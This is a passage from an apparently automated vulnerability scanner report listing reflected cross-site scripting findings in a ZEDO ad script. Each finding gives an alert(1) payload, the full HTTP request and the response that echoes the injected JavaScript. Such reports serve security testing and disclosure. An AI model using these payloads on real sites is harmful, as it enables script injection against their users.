User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:34260";alert(1)//38aea2a88ac;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1504B1120,1#822421|0,1,1;expires=Wed, 16 Mar 2011 01:15:05 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:15:05 GMT
Connection: close
Content-Length: 2866

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',34260";alert(1)//38aea2a88ac';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,34260";alert(1)//38aea2a88ac;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                   var zzStr = "s=1;u=INmz6woBAD
...[SNIP]...

1.150. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f4e5'-alert(1)-'557283196c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?1f4e5'-alert(1)-'557283196c1=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=1120,1,9; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFAbh=766B305,20|320_1#365; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=38
Expires: Mon, 14 Feb 2011 01:26:34 GMT
Date: Mon, 14 Feb 2011 01:25:56 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fm.js;qs=1f4e5'-alert(1)-'557283196c1=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

1.151. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16c4b'%3balert(1)//c3552fa4464 was submitted in the q parameter. This input was echoed as 16c4b';alert(1)//c3552fa4464 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=16c4b'%3balert(1)//c3552fa4464&$=&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='16c4b';alert(1)//c3552fa4464';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=16c4b';alert(1)//c3552fa4464;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.152. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdf1d"%3balert(1)//afba566bf60 was submitted in the q parameter. This input was echoed as cdf1d";alert(1)//afba566bf60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=cdf1d"%3balert(1)//afba566bf60&$=&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:19 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=285
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:19 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='cdf1d";alert(1)//afba566bf60';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=cdf1d";alert(1)//afba566bf60;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.153. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload befbf"%3balert(1)//9c15c465b7a was submitted in the q parameter. This input was echoed as befbf";alert(1)//9c15c465b7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=befbf"%3balert(1)//9c15c465b7a&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=62
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:57 GMT
Connection: close
Content-Length: 2066

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='befbf";alert(1)//9c15c465b7a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=befbf";alert(1)//9c15c465b7a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                                                                                   
...[SNIP]...

1.154. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12402'%3balert(1)//5f92dac5487 was submitted in the q parameter. This input was echoed as 12402';alert(1)//5f92dac5487 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=12402'%3balert(1)//5f92dac5487&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1504B1120,1#886265|0,1,1;expires=Wed, 16 Mar 2011 01:14:58 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=61
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:58 GMT
Connection: close
Content-Length: 1925

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='12402';alert(1)//5f92dac5487';var zzCustom='';
